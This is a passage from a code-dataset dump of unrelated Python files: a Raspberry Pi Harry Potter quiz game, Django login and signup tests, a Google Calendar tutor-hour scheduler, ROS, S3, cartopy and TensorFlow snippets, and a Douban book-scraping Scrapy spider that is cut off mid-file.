Scene.WELCOME\n\ndef callback_fn(channel):\n print(f'Restarting the game:')\nGPIO.add_event_detect(23, GPIO.FALLING, callback=callback_fn, bouncetime=300)\n\nwhile True:\n display_image(img_dict[screen])\n\n if screen == Scene.WELCOME:\n speak(f'We are pleased to inform that you have been admitted to Hogwarts School of Witchcraft and Wizardry!')\n speak(f'Before you join us next week, you are required to complete 5 tasks.')\n next_screen = Scene.ARE_YOU_READY\n\n if screen == Scene.ARE_YOU_READY:\n speak(f'Are you ready? Say YES or NO. Press the red button to repeat.')\n get_user_input()\n next_screen = Scene.DIAGON_ALLEY\n time.sleep(0.1)\n\n if screen == Scene.DIAGON_ALLEY:\n speak(f'Your first task is to enter Diagon Alley')\n next_screen = Scene.BRICK_IMAGE\n\n if screen == Scene.BRICK_IMAGE:\n speak(f\"Tap on the right brick to enter! Here is your clue.\")\n speak(f\"In this world, left means right and up means down!\")\n speak(f\"Start at 3,3. Move one step right, then left-up.\")\n speak(f\"Finally, move left down.\")\n speak(f\"Which brick did you land in?\")\n speak(f\"Press the green button when you ready to answer. Press red to repeat.\")\n\n repeat = blink_both_buttons()\n\n if not repeat:\n decision = int(input('Enter your choice: '))\n if decision != 1:\n speak('Wrong Answer! Think again!')\n speak(f\"Repeating instructions:\")\n else:\n speak(f\"Correct! Welcome to Diagon Alley.\")\n next_screen = Scene.OLLIVANDERS\n else:\n speak(f\"Repeating instructions:\")\n time.sleep(0.2)\n\n if screen == Scene.OLLIVANDERS:\n speak(f'Task Number 2')\n speak(f'You definitely need a wand before you are off to learn magic!')\n speak(f'Let us find you one.')\n next_screen = Scene.CHOOSE_WAND\n\n if screen == Scene.CHOOSE_WAND:\n speak(f'Use 3 words to describe yourself!')\n speak(f'This will help Ollivander pick a wand for you.')\n\n speak(f\"Press the green button when you ready to answer, red to repeat.\")\n\n while not (redButton.is_button_pressed() or greenButton.is_button_pressed()):\n redButton.LED_on(255); greenButton.LED_on(255)\n time.sleep(0.5)\n redButton.LED_off(); greenButton.LED_off()\n time.sleep(0.5)\n repeat = redButton.is_button_pressed()\n redButton.LED_off(); greenButton.LED_off()\n\n if not repeat:\n get_user_input()\n time.sleep(0.5)\n speak(f\"Hmm! Wood from Black Walnut and a Core of Dragon Heartstring, that is perfect for you.\")\n next_screen = Scene.HOGWARTS_EXPRESS\n else:\n speak(f\"Repeating instructions:\")\n time.sleep(0.2)\n\n if screen == Scene.HOGWARTS_EXPRESS:\n speak(f'Now that you have your wand, get aboard the Hogwarts Express!')\n speak(f'Enjoy your journey')\n time.sleep(1)\n speak(f'Looks like you are hungry.')\n speak(f'Let us buy Bertie Botts all flavour beans.')\n next_screen = Scene.BEANS\n \n if screen == Scene.BEANS:\n speak(f\"Which flavours do you want?\")\n answer = get_user_input(correct_answer=1, should_speak=True, wrong_answer_prompt='Boring Choice! Try something unique')\n speak(f\"Now, that is an interesting choice!\")\n next_screen = Scene.SUITCASE\n \n if screen == Scene.SUITCASE:\n speak(f'Welcome to Hogwarts!')\n speak(f'Before you proceed to The Great Hall, you need to get dressed.')\n speak(f'But you forgot the keys to your suitcase at home.')\n speak(f'Try to remember and use the spell to open the lock!')\n \n answer = get_user_input(correct_answer=1, should_speak=True, wrong_answer_prompt='Think harder! You can do this.')\n next_screen = Scene.USE_SPELL\n \n if screen == Scene.USE_SPELL:\n speak(f'Good Memory! Now get changed quickly!')\n speak(f'Dinner is about to begin.')\n next_screen = Scene.SORTING_HAT\n \n if screen == Scene.SORTING_HAT:\n speak(f'Welcome to the great hall! Hogwarts has 4 houses.')\n speak(', '.join(houses))\n speak(f'Use the rotating wheel to choose your House.')\n next_screen = Scene.CHOOSE_HOUSE\n \n if screen == Scene.CHOOSE_HOUSE:\n speak(f'Press the wheel to confirm.')\n while not twist.is_pressed():\n choice = twist.count % 4\n display_image(f'house-{choice}.png')\n time.sleep(0.2)\n \n speak(f'What are the 2 colors that represent {houses[choice]}?')\n answer = get_user_input(correct_answer=1, should_speak=True, wrong_answer_prompt='Think harder! You can do this.')\n speak(f\"That is the correct answer!\")\n speak(f'You are now part of {houses[choice]}.')\n next_screen = Scene.THANK_YOU\n\n if screen == Scene.THANK_YOU:\n time.sleep(0.5)\n speak(f'Thank you for playing!')\n speak(f'Good luck for your future at Hogwarts.')\n time.sleep(2)\n backlight.value = False\n break\n\n \n time.sleep(0.1)\n screen = next_screen\n\nsignal.signal(signal.SIGINT, signal_handler)\n","sub_path":"Lab 3/harrypotter.py","file_name":"harrypotter.py","file_ext":"py","file_size_in_byte":10363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"142545405","text":"import json\n\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\nfrom django.contrib import auth\n\nfrom apps.contacts.tests.helpers import create_user\n\n\nclass LoginFormTest(TestCase):\n def setUp(self) -> None:\n self.credentials = {\n 'username': 'testuser',\n 'password': '12345',\n }\n self.user = User.objects.create(username='testuser')\n self.user.set_password('12345')\n self.user.save()\n\n def test_login_status_code(self):\n \"\"\" test login status \"\"\"\n response = self.client.post(reverse('login'), self.credentials)\n self.assertEqual(response.status_code, 302)\n\n def test_user_is_authnicated(self):\n \"\"\" test user authnication \"\"\"\n self.client.post(reverse('login'), self.credentials)\n user = auth.get_user(self.client)\n assert user.is_authenticated\n\n\nclass SignupFormTest(TestCase):\n def setUp(self) -> None:\n self.credentials = {\n 'username': 'testuser',\n 'email': 'testuser@email.com',\n 'password1': 'HFHFVGHLVFJKHFG',\n 'password2': 'HFHFVGHLVFJKHFG',\n }\n\n def test_sighup_status_code(self):\n \"\"\" test login status \"\"\"\n response = self.client.post(reverse('signup'), self.credentials)\n self.assertEqual(response.status_code, 302)\n\n def test_redirection(self):\n \"\"\" test valid form submission redirects to home page \"\"\"\n response = self.client.post(reverse('signup'), self.credentials)\n login_url = reverse('login')\n self.assertRedirects(response, login_url)\n\n\nclass EditFormTest(TestCase):\n def setUp(self) -> None:\n self.data = {\n 'name': 'Hello',\n 'last_name': 'World',\n }\n self.user = create_user()\n\n def test_edit_post_status_code_for_valid_request(self):\n \"\"\" test edit post status code for valid post request \"\"\"\n self.client.force_login(self.user)\n response = self.client.post(\n reverse('edit'),\n self.data,\n **{'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest'},\n )\n self.assertEqual(response.status_code, 200)\n\n def test_edit_post_json_for_valid_request(self):\n \"\"\"test edit post's response json for valid post request\"\"\"\n self.client.force_login(self.user)\n response = self.client.post(\n reverse('edit'),\n self.data,\n **{'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest'},\n )\n self.assertEqual(response.json(), {'status': 'updated'})\n\n def test_non_ajax_post_request_status_code(self):\n \"\"\" test non ajax post_request_status_code \"\"\"\n self.client.force_login(self.user)\n response = self.client.post(reverse('edit'), self.data)\n self.assertEqual(response.status_code, 400)\n\n def test_edit_post_status_code_for_invalid_request(self):\n \"\"\" test edit post status code for invalid post request \"\"\"\n self.client.force_login(self.user)\n self.data['email'] = 'neonwave'\n self.response = self.client.post(\n reverse('edit'),\n self.data,\n **{'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest'},\n )\n self.assertEqual(self.response.status_code, 400)\n\n def test_edit_post_json_for_invalid_request(self):\n \"\"\"test edit post's response json for invalid post request\"\"\"\n self.client.force_login(self.user)\n self.data['email'] = 'neonwave'\n self.response = self.client.post(\n reverse('edit'),\n self.data,\n **{'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest'},\n )\n self.assertEqual(json.loads(self.response.content)['status'], 'form_invalid')\n","sub_path":"apps/contacts/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"338869906","text":"\nfrom __future__ import print_function\nimport httplib2\nimport os\n\nfrom apiclient import discovery\nfrom oauth2client import client\nfrom oauth2client import tools\nfrom oauth2client.file import Storage\nimport urllib.request\nimport re\n\nimport datetime\nimport pickle\nimport os.path\nfrom collections import defaultdict\nfrom enum import Enum\nimport json\n\nclass TaskInfo(Enum):\n TIMESTAMP = 0\n EMAIL = 1\n TASK = 2\n DATE = 3\n TIME = 4\n RECUR = 5\n\n# constants\nMAX_HOURS = 3\nMAX_TUTORS = 4\n\n# need an index to store from which request to process\nmasterReport = defaultdict(list)\nmasterTasks = list()\n\n# data\nnames = defaultdict() # {email: name}\ntutorHours = defaultdict(lambda:[[] for a in range(10)]) # {name: 0-9 -> list of datetime (\"month-day time\")}\nrestrictedHours = defaultdict(list) # {date: list of times}\nhourCount = defaultdict(int) # {datetime: count}\n\n# text files\nFILE_NAMES = \"8B_Names.json\"\nFILE_RESTRICT = \"8B_restricted_hours.json\"\nFILE_REQUEST = \"8B_requests.txt\"\n\ntry:\n import argparse\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\nexcept ImportError:\n flags = None\n\n# If modifying these scopes, delete your previously saved credentials\n# at ~/.credentials/calendar-python-quickstart.json\nSCOPES = 'https://www.googleapis.com/auth/calendar'\nCLIENT_SECRET_FILE = 'client_secret.json'\nAPPLICATION_NAME = 'Google Calendar'\n\n# calendar details\n# 8A Spring 2018 Calendar ID\nCAL_ID = 'eng.ucsd.edu_cprroni4e75jsicjt9bv26nm74@group.calendar.google.com'\nTIME_FROM = '2018-04-02T00:00:00-07:00'\nTIME_TO = '2018-06-08T23:59:59-07:00'\nLAST_DATE = '6/8/2018'\nLAST_HOUR = '21:00:00'\n\n# constant strings\nADD_DECLINE = 'Decline to add hour to calendar'\nREMOVE_DECLINE = 'Decline to remove hour to calendar'\n\ndef myPrint(data):\n for line in data:\n print(line)\n\ndef printTutorHours():\n\n\tglobal tutorHours\n\t\n\t# print tutor hours count\n\tfor tutor, weeks in tutorHours.items():\n\t\tprint(\"%s:\" % tutor)\n\t\tfor i in range(1, len(weeks)+1):\n\t\t\tprint(\"\\tWeek %s: %s\" % (i, weeks[i-1]))\n\ndef printError(message, name, time):\n print(message + \": \" + name + \" (\" + str(time) + \")\")\n\ndef convertToDatetime(date, time):\n '''Function to convert the date and time into datetime'''\n '''date: month/day/year, time: hr:min:sec'''\n \n # parse out the date and time\n month, day, year = [int(s) for s in date.split('/')]\n hour, minute, second = [int(s) for s in time.split(':')]\n\n # create datetime object\n myDatetime = datetime.datetime(year, month, day, hour, minute, second)\n\n return myDatetime\n\ndef convertTo24(time):\n '''Function to convert the am/pm time to 24 system time'''\n colonIndex = time.find(':')\n myHour = int(time[:colonIndex])\n if myHour == 12 and \"pm\" in time:\n return \"12:00:00\"\n elif \"am\" in time:\n return str(myHour) + \":00:00\"\n elif \"pm\" in time:\n return str(myHour+12) + \":00:00\"\n else:\n print(\"Erorr in converting to 24 hour system!\")\n\ndef get_credentials():\n \"\"\"Gets valid user credentials from storage.\n\n If nothing has been stored, or if the stored credentials are invalid,\n the OAuth2 flow is completed to obtain the new credentials.\n\n Returns:\n Credentials, the obtained credential.\n \"\"\"\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'calendar-python-quickstart.json')\n\n store = Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n if flags:\n credentials = tools.run_flow(flow, store, flags)\n else: # Needed only for compatibility with Python 2.6\n credentials = tools.run(flow, store)\n print('Storing credentials to ' + credential_path)\n return credentials\n\ndef parseData(fname):\n for l in open(fname):\n yield eval(l)\n\ndef readData():\n '''function to read in names for processing'''\n\n # global structures\n global names\n global restrictedHours\n\n print(\"Reading tutor names...\")\n names = json.load(open(FILE_NAMES))\n print(\"done\")\n\n print(\"Reading restricted hours...\")\n restrictedHours = json.load(open(FILE_RESTRICT))\n print(\"done\")\n\ndef getWeek(date):\n\t'''Function to calculate the week of the given date in datetime'''\n\n\tweek = 0\n\tstart = convertToDatetime(\"4/1/2018\", \"6:00:00\")\n\n\t# keep looping until reach week 10 or the start time is greater than date\n\twhile week < 10 and (date - start).total_seconds() > 0:\n\t\tweek += 1\n\t\tstart += datetime.timedelta(days = 7)\n\n\treturn week\n\ndef countTutors(service):\n\n global tutorHours\n global hourCount\n\n # get all of the events in this week\n events = service.events().list(calendarId=CAL_ID, timeMin=TIME_FROM,\n timeMax=TIME_TO, singleEvents=True, orderBy='startTime').execute()\n \n # iterate through all of the events in this week\n for event in events['items']:\n\n # get only those with title: Tutor hour with no TBD\n if event['status'] != 'cancelled' and 'Tutor Hour' in event['summary']:\n\n # parse the list of tutors in this event\n summary = event['summary']\n summary = summary[summary.find(\"(\")+1:len(summary)-1]\n listOfTutors = [t.strip() for t in re.split(',', summary)]\n startTime = str(event['start']['dateTime'])[:-6]\n endTime = str(event['end']['dateTime'])[11:-6]\n currDate = startTime[:10].split('-')\n startTime = startTime[11:]\n myDatetime = convertToDatetime(\\\n \t\"%s/%s/%s\" % (int(currDate[1]), int(currDate[2]), currDate[0]),\\\n \tstartTime)\n myWeek = getWeek(myDatetime)\n\n # increment count for this tutor\n for tutor in listOfTutors:\n \ttutorHours[tutor][myWeek-1].append(str(myDatetime))\n \thourCount[str(myDatetime)] += 1\n\n printTutorHours()\n\n # probably save to file instead of printing it\n\ndef readMasterReport():\n '''function to readin master report map from file'''\n global masterReport\n if os.path.isfile(\"masterReport.txt\") :\n with open(\"masterReport.txt\", \"rb\") as myFile:\n masterReport = pickle.load(myFile)\n\ndef writeMasterReport():\n '''function to print out report & write out master report map to file'''\n global masterReport\n for k, v in sorted(masterReport.items()):\n print(k)\n for t in v:\n print(\"\\t%s\\t%s\\t%s\" % (t[0], t[1], t[2]))\n\n with open(\"masterReport.txt\", \"wb\") as myFile:\n pickle.dump(masterReport, myFile)\n\ndef getEvent(timeslot, service):\n '''function that will return an event with the time slot if exists'''\n\n # get the events on that day\n startTime = \"%sT00:00:00-07:00\" % (timeslot.date())\n endTime = \"%sT23:59:59-07:00\" % (timeslot.date())\n\n # get all of the events in this time frame\n events = service.events().list(calendarId=CAL_ID, timeMin=startTime,\n timeMax=endTime, singleEvents=True, orderBy='startTime').execute()\n\n for event in events['items']:\n\n # get only those with title: Tutor hour with no TBD\n if event['status'] != 'cancelled' and 'Tutor Hour' in event['summary']:\n currTime = str(event['start']['dateTime'])[11:-6]\n if str(timeslot.time()) == currTime:\n # get the list of names\n return event\n\ndef addRequest(myTask, service):\n '''function to add hour to calendar if it passes the condition'''\n myEmail = myTask[TaskInfo.EMAIL.value]\n if myEmail not in names:\n \tprintError(\"No name found-\"+ ADD_DECLINE, myEmail, startTime)\n\n myName = names[myEmail]\n myDate = myTask[TaskInfo.DATE.value]\n allTime = myTask[TaskInfo.TIME.value].split(', ')\n repeatNum = int(myTask[TaskInfo.RECUR.value])\n lastHour = convertToDatetime(LAST_DATE, LAST_HOUR)\n\n for time in allTime:\n\n # split start and end time\n myTime = time.split('-')\n\n # convert the time to 24 hr system\n myTime[0] = convertTo24(myTime[0])\n myTime[1] = convertTo24(myTime[1])\n\n # get the datetime format of the current and future time\n myTimestamp = myTask[TaskInfo.TIMESTAMP.value].split()\n timestamp = convertToDatetime(myTimestamp[0], myTimestamp[1])\n startTime = convertToDatetime(myDate, myTime[0])\n endTime = convertToDatetime(myDate, myTime[1])\n deltaDay = (startTime - timestamp).total_seconds()\n myWeek = getWeek(startTime)\n\n repeatIndex = 0\n while (lastHour - startTime).total_seconds() >= 0 and repeatIndex < repeatNum:\n\n # 1st condition: a future time and at least 24 hours NOTE: not doing 24 hrs check\n # 2nd condition: less than maximum hour\n # 3rd condition: not a restricted hour\n # 4th condition: not repeated\n # 5th condition: current time slot has less than max tutors\n if deltaDay < 0:\n printError(\"It is not a future time-\" + ADD_DECLINE, myName, startTime)\n return\n # disable this for now, hard to keep track\n elif len(tutorHours[myName][myWeek-1]) >= MAX_HOURS:\n \tprintError(\"Has max hours-\" + ADD_DECLINE, myName, startTime)\n \treturn\n elif (myDate in restrictedHours and myTime[0] in restrictedHours[myDate]):\n printError(\"Restricted hours-\" + ADD_DECLINE, myName, startTime)\n return\n elif str(startTime) in tutorHours[myName][myWeek-1]:\n printError(\"Already in timeslot-\" + ADD_DECLINE, myName, startTime)\n return\n elif hourCount[str(startTime)[5:]] >= MAX_TUTORS:\n printError(\"Has max tutors-\" + ADD_DECLINE, myName, startTime)\n return\n\n # check if event exists, if not, create one, if yes, update the title\n myEvent = getEvent(startTime, service)\n if myEvent is None: \n\n # passed the conditions, add the event\n event = {'summary': 'Tutor Hour (%s)' % (myName),\n 'start': {'dateTime': '%sT%s-07:00' % (startTime.date(), startTime.time())},\n 'end': {'dateTime': '%sT%s-07:00' % (endTime.date(), endTime.time())}\n }\n\n event = service.events().insert(calendarId=CAL_ID, body=event).execute()\n print(\"created an event\")\n\n else:\n\n # update the current entry\n openIndex = myEvent['summary'].find('(')\n closeIndex = myEvent['summary'].find(')')\n myEvent['summary'] = 'Tutor Hour (' + myEvent['summary'][openIndex+1:closeIndex] + \", \" + myName + ')'\n updated_event = service.events().update(calendarId=CAL_ID, eventId=myEvent['id'], body=myEvent).execute()\n print(\"updated an event\")\n\n # update the recorded hours for this tutor\n tutorHours[myName][myWeek-1].append(str(startTime))\n\n # increment the time by a week\n startTime += datetime.timedelta(days = 7)\n endTime += datetime.timedelta(days = 7)\n repeatIndex += 1\n\ndef removeRequest(myTask, service):\n '''function to remove hour to calendar if it passes the condition'''\n myEmail = myTask[TaskInfo.EMAIL.value]\n if myEmail not in names:\n \tprintError(\"No name found-\"+ REMOVE_DECLINE, myEmail, startTime)\n\n myName = names[myEmail]\n myDate = myTask[TaskInfo.DATE.value]\n allTime = myTask[TaskInfo.TIME.value].split(', ')\n repeatNum = int(myTask[TaskInfo.RECUR.value])\n lastHour = convertToDatetime(LAST_DATE, LAST_HOUR)\n\n for time in allTime:\n\n # split start and end time\n myTime = time.split('-')\n\n # convert the time to 24 hr system\n myTime[0] = convertTo24(myTime[0])\n myTime[1] = convertTo24(myTime[1])\n\n # get the datetime format of the current and future time\n myTimestamp = myTask[TaskInfo.TIMESTAMP.value].split()\n timestamp = convertToDatetime(myTimestamp[0], myTimestamp[1])\n startTime = convertToDatetime(myDate, myTime[0])\n\n repeatIndex = 0\n while (lastHour - startTime).total_seconds() >= 0 and repeatIndex < repeatNum:\n\n # check if it is a future time\n deltaDay = (startTime - timestamp).total_seconds()\n if deltaDay < 0:\n printError(\"It is not a future time-\" + REMOVE_DECLINE, myName, startTime)\n return\n\n # get the event with this start time\n myEvent = getEvent(startTime, service)\n\n # check if hour exists, if not, no hours to remove\n if myEvent is None:\n printError(\"Hour doesn't exist-\", REMOVE_DECLINE, myName, startTime)\n return\n\n else:\n # update the current entry\n openIndex = myEvent['summary'].find('(')\n closeIndex = myEvent['summary'].find(')')\n listOfNames = myEvent['summary'][openIndex+1:closeIndex].split(', ')\n listOfNames.remove(myName)\n\n # case for no tutors in this slot\n if len(listOfNames) == 0:\n service.events().delete(calendarId=CAL_ID, eventId=myEvent['id']).execute()\n\n # case for removing this one tutor from this slot by updating the title\n else:\n strNames = listOfNames[0]\n for i in range(1, len(listOfNames)):\n strNames += \", \" + listOfNames[i]\n myEvent['summary'] = 'Tutor Hour (' + strNames + ')'\n updated_event = service.events().update(calendarId=CAL_ID, eventId=myEvent['id'], body=myEvent).execute()\n\n # increment the time by a week\n startTime += datetime.timedelta(days = 7)\n repeatIndex += 1\n\ndef readRequests():\n ''' function to read in the requests from google forms'''\n global masterTasks\n if os.path.isfile(FILE_REQUEST):\n with open (FILE_REQUEST) as myFile:\n masterTasks = myFile.readlines()\n\n # list of tuples: (timestamp, email, task, date, times, special)\n masterTasks = [tuple(s.replace('\\n', '').split('\\t')) for s in masterTasks]\n\n #myPrint(masterTasks)\n\ndef processRequests(service):\n '''function to distribute task processing in the tasks read in'''\n # need an index to jump to the new process\n for task in masterTasks:\n if task[2] == 'Add':\n addRequest(task, service)\n elif task[2] == 'Remove':\n removeRequest(task, service)\n\ndef main():\n \"\"\"Shows basic usage of the Google Calendar API.\n\n Creates a Google Calendar API service object and outputs a list of the next\n 10 events on the user's calendar.\n \"\"\"\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('calendar', 'v3', http=http)\n\n # read names to be input to calendar\n readData()\n\n # populate the tutor hours count for each tutors\n countTutors(service)\n\n # read requests and process them\n readRequests()\n processRequests(service)\n\n # double check print\n printTutorHours()\n\nif __name__ == '__main__':\n main()\n","sub_path":"run8B.py","file_name":"run8B.py","file_ext":"py","file_size_in_byte":14852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"116555743","text":"#!/usr/bin/env python\nfrom master_msgs.msg import arm_Orders\nimport rospy\n\nc = 0\nmsg = ''\ndef mover():\n global c,msg\n print('mover')\n if c == 0:\n msg.message = 'G50#'\n print('up')\n c = 1\n elif c == 1:\n msg.message = 'G0#'\n print('down')\n c = 2\n elif c == 2:\n msg.message = 'G50!'\n print('down')\n c = 3\n elif c == 3:\n msg.message = 'G0!'\n print('down')\n c = 0\n# else:\n# c = 0\n\n\ndef prueba():\n global msg\n rospy.init_node('nodo_prueba_brazo', anonymous=True)\n pub_Arm_Orders = rospy.Publisher('topic_arm_orders',arm_Orders,queue_size=10)\n msg = arm_Orders()\n\n rate = rospy.Rate(1)\n print('inicio')\n while not rospy.is_shutdown():\n mover()\n pub_Arm_Orders.publish(msg)\n rate.sleep()\n\nif __name__ == '__main__':\n try:\n prueba()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"scripts/prueba_brazo.py","file_name":"prueba_brazo.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"393724585","text":"import boto3\nimport sys\nfrom botocore.exceptions import ClientError\n\ndef createBucket(bucket_name,region = None):\n try:\n print(bucket_name)\n if region is None:\n s3_client = boto3.client(\"s3\")\n s3_client.create_bucket(Bucket=bucket_name)\n else:\n s3_client = boto3.client(\"s3\",region_name = region)\n location = { 'LocationConstraint':region}\n s3_client.create_bucket(Bucket=bucket_name,CreateBucketConfiguration=location)\n except ClientError as e:\n print (\"ErrorCode:10\")\n print (\"ErrorName:ClientError\")\n print (\"ErrorMsg:{0}\".format(str(e)))\ndef viewAllBuckets():\n try:\n s3_client = boto3.client(\"s3\")\n print (dir(s3_client)) ### Get the attributes of s3_client i.e propeties,functions\n res = s3_client.list_buckets()\n print (res)\n for val in res['Buckets']:\n print (val)\n except ClientError as e:\n print (\"ErrorCode:10\")\n print (\"ErrorName:ClientError\")\n print (\"ErrorMsg:{0}\".format(str(e)))\nviewAllBuckets()\n","sub_path":"s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"367571982","text":"# program r6_03_mapa_eu.py\n# podstawowa mapa\n\nfrom sys import exit\n\ntry:\n import cartopy.crs as crs\n import cartopy.feature as cfeature\n\n print(\"Moduł cartopy wczytany.\")\nexcept:\n print(\"Zainstaluj: 'pip install cartopy' \")\n exit(0)\n\ntry:\n import matplotlib.pyplot as plt\n\n print(\"Moduł matplotlib wczytany.\")\nexcept:\n print(\"Zainstaluj: 'pip install matplotlib' \")\n exit(0)\n\n# wczytane dane będziemy zapisywać jako obiekty `list`\ncities = [] # nazwy miejscowości\nX = [] # szerokość geograficzna\nY = [] # długość geograficzna\n\n# wczytujemy dane z pliku\nwith open(\"miasta.csv\", \"r\", encoding='utf-8') as dane:\n cities_all = dane.readlines()\n\nprint(cities_all)\n\n# czyścimy dane\nfor city in cities_all:\n datas = city.strip().split(\",\")\n cities.append(datas[0])\n X.append(float(datas[1]))\n Y.append(float(datas[2]))\n\n# teraz zobaczymy nasze dane\nprint(cities, X, Y, sep=\"\\n======\\n\")\n\n# tworzymy okno\nfigure = plt.figure(figsize=(7, 5))\nax = figure.add_subplot(\n 1, 1, 1, projection=crs.Mercator()\n) # dodajemy projekcję Merkatora\n\n# dodajemy właściwość do mapy, zdjęcie\nax.stock_img()\n\n# wydzielamy tylko wycinek mapy\nax.set_extent([-10, 35, 66, 34], crs=crs.PlateCarree())\n\n# wyświetlamy okno\nplt.show()\n","sub_path":"Rozdzial_6/r6_03_mapa_pl.py","file_name":"r6_03_mapa_pl.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"396135635","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n File Name:learning_rate\n Author:jasonhaven\n date:18-9-10\n-------------------------------------------------\n Change Activity:18-9-10:\n-------------------------------------------------\n\"\"\"\nimport tensorflow as tf\n\nw = tf.Variable(tf.constant(5,dtype=tf.float32))\n\nloss = tf.square(w + 1)\n\ntrain_step = tf.train.GradientDescentOptimizer(0.2).minimize(loss)\n\nwith tf.Session() as sess:\n\tsess.run(tf.global_variables_initializer())\n\tfor i in range(40):\n\t\tsess.run(train_step)\n\t\tw_val = sess.run(w)\n\t\tloss_val = sess.run(loss)\n\n\t\tprint('w is %f , loss is %f.' % (w_val, loss_val))\n","sub_path":"tensorflow/人工智能实践/神经网络优化/learning_rate.py","file_name":"learning_rate.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"549581703","text":"import os\nimport re\nfrom html import unescape\nimport scrapy\nfrom scrapy.http import Request\nimport logging\nfrom scrapy.spidermiddlewares.httperror import HttpError\nfrom twisted.internet.error import DNSLookupError, TCPTimedOutError\nfrom ..items import BookItem\nfrom app.utils import WHITE_PATTERN, strip_tags, merge_white\nfrom app.settings import BASEPATH\n\n\nclass DoubanSpider(scrapy.Spider):\n name = 'douban'\n\n # config root logging\n root_logger = logging.getLogger('root')\n rh = logging.FileHandler(os.path.join(BASEPATH, 'log/douban', 'debug.log'))\n rh.setLevel(logging.DEBUG)\n root_logger.addHandler(rh)\n\n # config error logging\n mylogger = logging.getLogger('cymoo')\n mylogger.setLevel(logging.INFO)\n ch = logging.FileHandler(os.path.join(BASEPATH, 'log/douban', 'error.log'), encoding='utf-8')\n ch.setLevel(logging.ERROR)\n mylogger.addHandler(ch)\n\n custom_settings = {\n 'IMAGES_STORE': os.path.join(BASEPATH, 'data/images'),\n 'IMAGES_URLS_FIELD': 'image_urls',\n 'IMAGES_RESULT_FIELD': 'images',\n 'ITEM_PIPELINES': {\n # 'scrapy.pipelines.images.ImagesPipeline': 1,\n 'app.pipelines.douban.BookAttrPipeline': 10,\n 'app.pipelines.douban.SQLitePipeline': 13\n }\n }\n # allowed_domains = []\n list_page_base = 'https://book.douban.com/tag/{}?start=0&type=T'\n start_urls = [\n # 'https://book.douban.com/tag/文学?start=0&type=T'\n # 'https://book.douban.com/tag/编程?start=0&type=T',\n # 'https://book.douban.com/tag/web?start=0&type=T',\n # 'https://book.douban.com/tag/程序?start=0&type=T',\n # 'https://book.douban.com/tag/算法?start=0&type=T',\n 'https://book.douban.com/tag/?view=type&icn=index-sorttags-all'\n ]\n\n def start_requests(self):\n yield from (Request(url, callback=self.parse_index) for url in self.start_urls)\n\n def parse_index(self, response):\n for tag in response.css('.tagCol td a::text').extract():\n yield Request(self.list_page_base.format(tag),\n callback=self.parse_list,\n errback=self.errback,\n meta={'type': tag})\n\n def parse_list(self, response):\n for item_url in response.css('.subject-item h2 a::attr(href)').extract():\n yield response.follow(item_url,\n callback=self.parse_item,\n errback=self.errback,\n meta={'type': response.meta['type']})\n next_url = response.css('.paginator .next a::attr(href)').extract_first()\n if next_url:\n yield response.follow(next_url,\n callback=self.parse_list,\n errback=self.errback,\n meta={'type': response.meta['type']})\n\n def parse_item(self, response):\n try:\n info = _book_info(response.css('#info').extract_first())\n except Exception as e:\n self.mylogger.error('%s on %s', repr(e), response.url)\n title = response.css('#wrapper > h1 span::text').extract_first()\n intros = response.css('#link-report .intro')\n if len(intros) == 0:\n intro = ''\n elif len(intros) == 1:\n intro = intros.extract_first()\n else:\n intro = intros[1].extract()\n\n rating = response.css('.rating_num::text').extract_first()\n rate_num = response.css('.rating_people span::text').extract_first()\n type = response.meta['type']\n url = response.url\n\n item = BookItem(info)\n item['title'] = title\n item['type'] = type\n item['rating'] = rating\n item['rate_num'] = rate_num\n item['url'] = url\n item['intro'] = intro\n\n yield item\n\n def errback(self, failure):\n # \"http://www.httpbin.org/\", HTTP 200 expected\n # \"http://www.httpbin.org/status/404\", Not found error\n # \"http://www.httpbin.org/status/500\", server issue\n # \"http://www.httpbin.org:12345/\", non-responding host, timeout expected\n # \"http://www.httphttpbinbin.org/\", DNS error expected\n self.mylogger.error(repr(failure))\n if failure.check(HttpError):\n response = failure.value.response\n self.mylogger.error('HTTPError on %s', response.url)\n elif failure.check(DNSLookupError):\n request = failure.request\n self.mylogger.error('DNSLookupError on %s', request.url)\n elif failure.check(TimeoutError, TCPTimedOutError):\n request = failure.request\n self.mylogger.error('TimeoutError on %s', request.url)\n\n # things like session related data or authentication tokens will be pre-populated\n # def parse_login(self, response):\n # return scrapy.FormRequest.from_response(\n # response,\n # formdata={'username': 'cymoo', 'password': 'secret'},\n # callback=self.after_login\n # )\n #\n # def after_login(self, response):\n # if 'authentication failed' in response.body:\n # self.logger.error('Login failed')\n # return\n # # continue scraping with authenticated session...\n\n # Called when the spider closes.\n # This method provides a shortcut to signals.connect() for the spider_closed signal.\n def 